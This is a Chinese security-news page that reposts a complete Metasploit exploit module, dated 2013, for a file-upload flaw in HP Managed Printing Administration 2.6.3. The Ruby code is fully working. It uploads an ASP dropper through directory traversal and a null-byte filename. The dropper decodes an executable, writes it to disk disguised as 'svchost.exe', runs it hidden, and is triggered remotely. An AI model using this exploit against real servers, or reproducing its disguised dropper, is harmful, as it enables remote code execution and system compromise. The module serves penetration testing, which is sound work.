首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
HP Managed Printing Administration jobAcct Remote Command Execution
来源:metasploit.com 作者:vazquez 发布时间:2013-07-19  
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpClient
	include Msf::Exploit::EXE

	def initialize
		super(
			'Name'        => 'HP Managed Printing Administration jobAcct Remote Command Execution',
			'Description'    => %q{
				This module exploits an arbitrary file upload vulnerability on HP Managed Printing
				Administration 2.6.3 (and before). The vulnerability exists in the UploadFiles()
				function from the MPAUploader.Uploader.1 control, loaded and used by the server.
				The function can be abused via directory traversal and null byte injection in order
				to achieve arbitrary file upload.  In order to exploit successfully, a few conditions
				must be met: 1) A writable location under the context of Internet Guest Account
				(IUSR_*), or Everyone is required. By default, this module will attempt to write to
				/hpmpa/userfiles/, but you may specify the WRITEWEBFOLDER datastore option to provide
				another writable path. 2)  The writable path must also be readable by a browser,
				this typically means a location under wwwroot. 3) You cannot overwrite a file with
				the same name as the payload.
			},
			'Author'      => [
				'Andrea Micalizzi', # aka rgod - Vulnerability Discovery
				'juan vazquez' # Metasploit module
			],
			'Platform'    => 'win',
			'References'  =>
				[
					['CVE', '2011-4166'],
					['OSVDB', '78015'],
					['BID', '51174'],
					['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-352/'],
					['URL', 'https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03128469']
				],
			'Targets'     =>
				[
					[ 'HP Managed Printing Administration 2.6.3 / Microsoft Windows [XP SP3 | Server 2003 SP2]', { } ],
				],
			'DefaultTarget'  => 0,
			'Privileged'     => false,
			'DisclosureDate' => 'Dec 21 2011'
		)

		register_options(
			[
				OptString.new('WRITEWEBFOLDER', [ false,  "Additional Web location with file write permissions for IUSR_*" ])
			], self.class)
	end

	def peer
		return "#{rhost}:#{rport}"
	end

	def webfolder_uri
		begin
			u = datastore['WRITEWEBFOLDER']
			u = "/" if u.nil? or u.empty?
			URI(u).to_s
		rescue ::URI::InvalidURIError
			print_error "Invalid URI: #{datastore['WRITEWEBFOLDER'].inspect}"
			return "/"
		end
	end

	def to_exe_asp(exes = '')

		var_func    = Rex::Text.rand_text_alpha(rand(8)+8)
		var_stream  = Rex::Text.rand_text_alpha(rand(8)+8)
		var_obj     = Rex::Text.rand_text_alpha(rand(8)+8)
		var_shell   = Rex::Text.rand_text_alpha(rand(8)+8)
		var_tempdir = Rex::Text.rand_text_alpha(rand(8)+8)
		var_tempexe = Rex::Text.rand_text_alpha(rand(8)+8)
		var_basedir = Rex::Text.rand_text_alpha(rand(8)+8)

		var_f64name   = Rex::Text.rand_text_alpha(rand(8)+8)
		arg_b64string = Rex::Text.rand_text_alpha(rand(8)+8)
		var_length    = Rex::Text.rand_text_alpha(rand(8)+8)
		var_out       = Rex::Text.rand_text_alpha(rand(8)+8)
		var_group     = Rex::Text.rand_text_alpha(rand(8)+8)
		var_bytes     = Rex::Text.rand_text_alpha(rand(8)+8)
		var_counter   = Rex::Text.rand_text_alpha(rand(8)+8)
		var_char      = Rex::Text.rand_text_alpha(rand(8)+8)
		var_thisdata  = Rex::Text.rand_text_alpha(rand(8)+8)
		const_base64  = Rex::Text.rand_text_alpha(rand(8)+8)
		var_ngroup    = Rex::Text.rand_text_alpha(rand(8)+8)
		var_pout      = Rex::Text.rand_text_alpha(rand(8)+8)

		vbs = "<%\r\n"

		# ASP Base64 decode from Antonin Foller http://www.motobit.com/tips/detpg_base64/
		vbs << "Function #{var_f64name}(ByVal #{arg_b64string})\r\n"
		vbs << "Const #{const_base64} = \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\"\r\n"
		vbs << "Dim #{var_length}, #{var_out}, #{var_group}\r\n"
		vbs << "#{arg_b64string} = Replace(#{arg_b64string}, vbCrLf, \"\")\r\n"
		vbs << "#{arg_b64string} = Replace(#{arg_b64string}, vbTab, \"\")\r\n"
		vbs << "#{arg_b64string} = Replace(#{arg_b64string}, \" \", \"\")\r\n"
		vbs << "#{var_length} = Len(#{arg_b64string})\r\n"
		vbs << "If #{var_length} Mod 4 <> 0 Then\r\n"
		vbs << "Exit Function\r\n"
		vbs << "End If\r\n"
		vbs << "For #{var_group} = 1 To #{var_length} Step 4\r\n"
		vbs << "Dim #{var_bytes}, #{var_counter}, #{var_char}, #{var_thisdata}, #{var_ngroup}, #{var_pout}\r\n"
		vbs << "#{var_bytes} = 3\r\n"
		vbs << "#{var_ngroup} = 0\r\n"
		vbs << "For #{var_counter} = 0 To 3\r\n"
		vbs << "#{var_char} = Mid(#{arg_b64string}, #{var_group} + #{var_counter}, 1)\r\n"
		vbs << "If #{var_char} = \"=\" Then\r\n"
		vbs << "#{var_bytes} = #{var_bytes} - 1\r\n"
		vbs << "#{var_thisdata} = 0\r\n"
		vbs << "Else\r\n"
		vbs << "#{var_thisdata} = InStr(1, #{const_base64}, #{var_char}, vbBinaryCompare) - 1\r\n"
		vbs << "End If\r\n"
		vbs << "If #{var_thisdata} = -1 Then\r\n"
		vbs << "Exit Function\r\n"
		vbs << "End If\r\n"
		vbs << "#{var_ngroup} = 64 * #{var_ngroup} + #{var_thisdata}\r\n"
		vbs << "Next\r\n"
		vbs << "#{var_ngroup} = Hex(#{var_ngroup})\r\n"
		vbs << "#{var_ngroup} = String(6 - Len(#{var_ngroup}), \"0\") & #{var_ngroup}\r\n"
		vbs << "#{var_pout} = Chr(CByte(\"&H\" & Mid(#{var_ngroup}, 1, 2))) + _\r\n"
		vbs << "Chr(CByte(\"&H\" & Mid(#{var_ngroup}, 3, 2))) + _\r\n"
		vbs << "Chr(CByte(\"&H\" & Mid(#{var_ngroup}, 5, 2)))\r\n"
		vbs << "#{var_out} = #{var_out} & Left(#{var_pout}, #{var_bytes})\r\n"
		vbs << "Next\r\n"
		vbs << "#{var_f64name} = #{var_out}\r\n"
		vbs << "End Function\r\n"

		vbs << "Sub #{var_func}()\r\n"
		vbs << "#{var_bytes} = #{var_f64name}(\"#{Rex::Text.encode_base64(exes)}\")\r\n"
		vbs << "Dim #{var_obj}\r\n"
		vbs << "Set #{var_obj} = CreateObject(\"Scripting.FileSystemObject\")\r\n"
		vbs << "Dim #{var_stream}\r\n"
		vbs << "Dim #{var_tempdir}\r\n"
		vbs << "Dim #{var_tempexe}\r\n"
		vbs << "Dim #{var_basedir}\r\n"
		vbs << "Set #{var_tempdir} = #{var_obj}.GetSpecialFolder(2)\r\n"

		vbs << "#{var_basedir} = #{var_tempdir} & \"\\\" & #{var_obj}.GetTempName()\r\n"
		vbs << "#{var_obj}.CreateFolder(#{var_basedir})\r\n"
		vbs << "#{var_tempexe} = #{var_basedir} & \"\\\" & \"svchost.exe\"\r\n"
		vbs << "Set #{var_stream} = #{var_obj}.CreateTextFile(#{var_tempexe},2,0)\r\n"
		vbs << "#{var_stream}.Write #{var_bytes}\r\n"
		vbs << "#{var_stream}.Close\r\n"
		vbs << "Dim #{var_shell}\r\n"
		vbs << "Set #{var_shell} = CreateObject(\"Wscript.Shell\")\r\n"

		vbs << "#{var_shell}.run #{var_tempexe}, 0, false\r\n"
		vbs << "End Sub\r\n"

		vbs << "#{var_func}\r\n"
		vbs << "%>\r\n"
		vbs
	end

	def upload(contents, location)
		post_data = Rex::MIME::Message.new
		post_data.add_part("upload", nil, nil, "form-data; name=\"upload\"")
		post_data.add_part(contents, "application/octet-stream", "binary", "form-data; name=\"uploadfile\"; filename=\"..\\../../wwwroot#{location}\x00.tmp\"")
		data = post_data.to_s
		data.gsub!(/\r\n\r\n--_Part/, "\r\n--_Part")

		res = send_request_cgi({
			'uri'      => normalize_uri("hpmpa", "jobAcct", "Default.asp"),
			'method'   => 'POST',
			'ctype'    => "multipart/form-data; boundary=#{post_data.bound}",
			'data'     => data,
			'encode_params' => false,
			'vars_get' => {
				'userId' => rand_text_numeric(2+rand(2)),
				'jobId'  => rand_text_numeric(2+rand(2))
				}
			})
		return res
	end

	def check
		res = send_request_cgi({'uri' => normalize_uri("hpmpa", "home", "Default.asp")})
		version = nil
		if res and res.code == 200 and res.body =~ /HP Managed Printing Administration/ and res.body =~ /<dd>v(.*)<\/dd>/
			version = $1
		else
			return Exploit::CheckCode::Safe
		end

		vprint_status("HP MPA Version Detected: #{version}")

		if version <= "2.6.3"
			return Exploit::CheckCode::Appears
		end

		return Exploit::CheckCode::Safe

	end

	def exploit
		# Generate the ASP containing the EXE containing the payload
		exe = generate_payload_exe
		# Not using Msf::Util::EXE.to_exe_asp because the generated vbs is too long and the app complains
		asp = to_exe_asp(exe)

		#
		# UPLOAD
		#
		asp_name = "#{rand_text_alpha(5+rand(3))}.asp"
		locations = [
			"/hpmpa/userfiles/images/printers/",
			"/hpmpa/userfiles/images/backgrounds/",
			"/hpmpa/userfiles/images/",
			"/hpmpa/userfiles/",
			"/"
		]

		locations << normalize_uri(webfolder_uri, asp_name) if datastore['WRITEWEBFOLDER']

		payload_url = ""

		locations.each {|location|
			asp_location = location + asp_name
			print_status("#{peer} - Uploading #{asp.length} bytes to #{location}...")
			res = upload(asp, asp_location)
			if res and res.code == 200 and res.body =~ /Results of Upload/ and res.body !~ /Object\[formFile\]/
				print_good("#{peer} - ASP Payload successfully wrote to #{location}")
				payload_url = asp_location
				break
			elsif res and res.code == 200 and res.body =~ /Results of Upload/ and res.body =~ /Object\[formFile\]/
				print_error("#{peer} - Error probably due to permissions while writing to #{location}")
			else
				print_error("#{peer} - Unknown error while while writing to #{location}")
			end
		}

		if payload_url.empty?
			fail_with(Exploit::Failure::NotVulnerable, "#{peer} - Failed to upload ASP payload to the target")
		end

		#
		# EXECUTE
		#
		print_status("#{peer} - Executing payload through #{payload_url}...")
		send_request_cgi({ 'uri' => payload_url})
	end

end


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Windows Movie Maker Version 2.
·Apple Quicktime 7 Invalid Atom
·Symantec Workspace Virtualizat
·Nginx 1.3.9 / 1.4.0 Buffer Ove
·PCMan FTP Server 2.0.7 - Remot
·Microsoft Office PowerPoint 20
·VbsEdit 5.9.3 (.smi) - Buffer
·BlazeDVD Pro player 6.1 - Stac
·Samsung PS50C7700 TV - Denial
·Eglibc PTR MANGLE Bug
·D-Link Devices UPnP SOAP Comma
·Kate's Video Toolkit Version 7
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved